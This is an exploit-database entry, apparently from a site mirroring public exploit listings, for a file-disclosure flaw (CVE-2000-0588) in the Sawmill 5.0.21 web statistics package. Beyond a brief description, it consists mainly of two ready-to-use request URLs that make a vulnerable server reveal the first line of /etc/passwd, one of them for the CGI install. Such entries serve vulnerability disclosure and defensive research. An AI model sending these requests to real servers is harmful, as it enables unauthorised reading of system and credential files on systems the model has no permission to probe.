[] NeoSense
E X P L O I T S
title author type platform port cve id

Flowerfire Sawmill 5.0.21 - File Access

Author: Larry W. Cashdollar
type: remote
platform: cgi
port: 
date_added: 2000-06-26 
date_updated: 2012-07-23 
verified: 1 
codes: CVE-2000-0588;OSVDB-352 
tags: 
aliases:  
screenshot_url:  
application_url: 
source: https://www.securityfocus.com/bid/1402/info

Sawmill is a site statistics package for Unix, Windows and Mac OS. A specially crafted request can disclose the first line of any world readable file for which the full pathname is known, for example /etc/passwd. The output of the request is similar to the following: 'Unknown configuration command "root:x:0:0:root:/root:/bin/sh" in "/etc/passwd".'

The following request will display the first line of /etc/passwd

http://target:port/sawmill?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3

If sawmill is run as a cgi script, the following can be used instead:

http://target/cgi-bin/sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.